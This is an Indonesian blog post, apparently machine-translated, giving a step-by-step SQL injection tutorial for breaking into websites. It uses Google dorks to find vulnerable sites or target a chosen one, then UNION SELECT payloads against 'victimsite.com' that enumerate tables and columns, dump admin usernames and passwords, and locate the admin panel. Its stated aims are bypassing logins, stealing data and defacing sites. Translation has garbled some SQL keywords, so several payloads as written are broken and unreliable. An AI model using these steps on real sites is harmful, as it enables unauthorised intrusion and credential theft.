| Filename | Hacking website menggunakan SQL Injection-panduan langkah demi langkah |
| Permission | rw-r--r-- |
| Author | Ipunksyalman |
| Date and Time | 14.53 |
| Label | Hacking |
| Action |
SQL injection adalah salah satu metode aplikasi web populer hacking. Menggunakan SQL Injectionserangan, orang yang tidak berhak dapat mengakses database yang website. Penyerang dapat mengekstrak data dari database .
Apa yang seorang hacker dapat dilakukan dengan SQL Injection serangan? *
Melewati Login * Mengakses data rahasia * Memodifikasi isi dari situs * Mematikan SQL server saya Jadi, di sini kita pergi.
Langkah 1: Menemukan Situs Rentan :
Untuk mencari SQL Injection situs rentan, Anda dapat menggunakan pencarian Google dengan mencari kata kunci tertentu. Kata kunci mereka yang sering disebut sebagai 'dork Google'. Beberapa Contoh:inurl:? index.php id = inurl: gallery.php id =? inurl: article.php id =? inurl: pageid = Berikut adalah daftar besar Dork Google http :/ / www.ziddu.com/download/13161874/A...t.zip.html
Copy salah satu kata kunci di atas dan paste di google. Di sini, kita akan mendapat banyak hasil pencarian dengan
Kita harus mengunjungi website satu per satu untuk memeriksa kerentanan. Catatan: jika Anda ingin hack situs web tertentu, kemudian coba ini : situs: www.victimsite.com dork_list_commands untuk misalnya:
Situs: www.victimsite.com inurl: index.php id =?Langkah 2: Memeriksa Kerentanan tersebut:
Sekarang mari kita memeriksa kerentanan situs target. Untuk memeriksa kerentanan, tambahkan tanda kutip tunggal (') pada akhir url dan tekan enter. Untuk misalnya:
http://www.victimsite.com/index.php?id=2 '
Jika halaman tetap di halaman yang sama atau menunjukkan bahwa halaman tidak ditemukan, maka tidak rentan. Jika Anda mendapat pesan error seperti ini, maka itu berarti bahwa situs tersebut rentanAnda memiliki kesalahan dalam sintaks SQL Anda, periksa manual yang sesuai dengan Anda MySQL server versi untuk sintaks hak untuk menggunakan dekat '\'' at line 1
Langkah 3: Mencari Jumlah kolom:Besar, kami telah menemukan bahwa website ini rentan terhadap serangan SQLi. Langkah selanjutnya kami adalah untuk menemukan jumlah kolom hadir dalam target basis data . Untuk itu menggantikan tanda kutip tunggal (') dengan "order by n "pernyataan. Mengubah n dari 1,2,3,4,, 5,6, ... n. Sampai Anda mendapatkan error seperti "kolom yang tidak diketahui". Untuk misalnya:
Jika Anda mendapatkan error ketika mencoba "x" jumlah th, maka tidak ada kolom adalah "x-1".Maksudku:http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/ index.php id =? 2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
http://www.victimsite.com/index.php?id=2 order by 1 (noerror)
http://www.victimsite.com/index.php?id=2 order by 2 (noerror)
http:// www.victimsite.com/index.php?id=2 order by 3 (noerror)
http://www.victimsite.com/index.php?id=2 order by 4 (noerror)
http://www.victimsite. com / index.php id =? 2 order by 5 (noerror)
http://www.victimsite.com/index.php?id=2 order by 6 (noerror)
http://www.victimsite.com/index. php id = 2 order by 7 (noerror)?
http://www.victimsite.com/index.php?id=2 order by 8 (error)
jadi sekarang x = 8, Jumlah kolom adalah x-1 yaitu, 7. Dalam hal, jika metode di atas gagal untukbekerja untuk Anda, kemudian mencoba untuk menambahkan "-" di akhir pernyataan tersebut. Untuk misalnya:
http://www.victimsite.com/index.php?id=2 order by 1 -
Langkah 4: Menemukan kolom Rentan:Kami telah berhasil menemukan jumlah kolom hadir dalam target basis data . Mari kita menemukan kolom rentan dengan mencoba query "serikat pilih columns_sequence ". Mengubah nilai id ke negatif (i berarti id = -2). Ganti columns_sequence dengan no 1 sampai x-1 (jumlah kolom) dipisahkan dengan koma (,). Untuk misalnya: jika jumlah kolom adalah 7, maka query adalah sebagai berikut:
http://www.victimsite.com/index.php?id=-2 serikat pilih 1,2,3,4,5,6,7 -
Jika metode di atas tidak bekerja maka coba ini :
http://www.victimsite.com/index.php?id=-2 dan 1 = 2 union select 1,2,3,4,5,6,7 -
Setelah Anda mengeksekusi query, maka akan muncul kolom rentan. Bingo, kolom '3 'dan '7' yang ditemukan rentan. Mari kita mengambil kolom rentan '3 pertama '. Kita bisa menyuntikkan permintaan kami di kolom ini. Langkah 5: Menemukan versi, basis data , pengguna Ganti 3 dari query dengan "versi ()" Untuk misalnya:
http://www.victimsite.com/index.php?id=-2 dan 1 = 2 union select 1,2, version () ,4,5,6,7 -
Sekarang, itu akan menampilkan versi 5.0.1 sebagai atau 4,3. . sesuatu seperti ini Ganti versi () dengan basis data () dan pengguna () untuk menemukan basis data , pengguna masing-masing.Untuk misalnya:
http://www.victimsite.com/index.php?id=-2 dan 1 = 2 union select 1,2,basis data () ,4,5,6,7 -
http://www.victimsite.com/index.php?id=-2 dan 1 = 2 union select 1,2, pengguna () ,4,5,6,7 -
Jika di atas tidak bekerja, maka coba ini :
http://www.victimsite.com/index.php?id=-2 dan 1 = 2 union select 1,2, unhex (hex (@ @ version)) ,4,5,6,7 -
Langkah 6: Menemukan Nama TableJika database versi 5 atau di atas. Jika versi yang 4.x, maka Anda harus menebak nama tabel (blindsql injection serangan). Mari kita menemukan nama tabel dari basis data . Ganti 3 dengan "group_concat (table_name) dan tambahkan" dari information_schema.tables mana table_schema =Database () " Untuk misalnya:
Sekarang akan menampilkan daftar nama tabel. Cari nama tabel yang berkaitan dengan admin atau pengguna. Mari kita memilih "admin" table. Langkah 7: Menemukan Nama Kolom Sekarang ganti "group_concat (table_name) dengan" group_concat (column_name) " Ganti " dari information_schema . tabel mana table_schema = Database () - "dengan" DARI MANA information_schema.columns table_name = mysqlchar - Kita harus mengubah nama tabel ke MySql CHAR () string. Instal addon HackBar: https://addons.mozilla. org/en-US/firefox/addon/3899 / Setelah Anda menginstal add-on, Anda dapat melihat toolbar yang akan terlihat seperti yang berikut. Jika Anda tidak dapat melihat Hackbar, lalu tekan F9. Pilih sql-> Mysql-> MysqlChar () di Hackbar tersebut. Ini akan meminta Anda untuk memasukkan string yang akan dikonversi ke MySQLCHAR (). Kami ingin mengubah nama tabel ke MySQLChar. Dalam kasus kami nama tabel adalah 'admin'. Sekarang Anda dapat melihat (angka yang dipisahkan dengan commans) CHAR di toolbar Hack. Copy dan paste kode di akhir url bukan "mysqlchar" Untuk misalnya:
http://www.victimsite.com/index.php?id=-2 dan 1 = 2 union select 1,2, group_concat (table_name), 4,5,6,7 dari information_schema.tables mana table_schema = basis data () -
http://www.victimsite.com/index.php?id=-2 dan 1 = 2 union select 1,2, group_concat (column_name) , 4,5,6,7 dari information_schema.columns mana nama_tabel = CHAR (97 , 100, 109, 105, 110) -Pertanyaan di atas akan menampilkan daftar kolom. Sebagai contoh: admin, password, admin_id, ADMIN_NAME, admin_password, aktif, id, ADMIN_NAME, admin_pas s, admin_id, ADMIN_NAME, admin_password, ID_admin, admin_username, username, password dll .. . Sekarang ganti ganti dengan group_concat (column_name) dengan group_concat ( columnname1 , 0x3a,anothercolumnname2 ). Sekarang ganti "dari information_schema.columns mana nama_tabel = CHAR (97, 100, 109, 105, 110)" dengan "dari table_name" Untuk misalnya:
http://www.victimsite.com/index.php?id=-2
dan 1 = 2 union select 1,2, group_concat (admin_id, 0x3a, admin_password), 4,5,6,7 dari admin -
Jika query di atas menampilkan 'kolom tidak ditemukan' erro, kemudian coba nama lain kolom dari daftar. Jika kami mendapat keberuntungan, maka akan menampilkan data yang disimpan dalamdatabase yang tergantung pada nama kolom Anda. Untuk kolom Misalnya, username dan password akan menampilkan kredensial login disimpan dalam basis data . Langkah 8: Menemukan Panel Admin: Hanya mencoba dengan url seperti:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
dll Jika Anda punya keberuntungan, Anda akan menemukan halaman admin menggunakan url di atas.atau Anda dapat semacam alat finder admin.
Tutorial by : http://www.breakthesecurity.com/
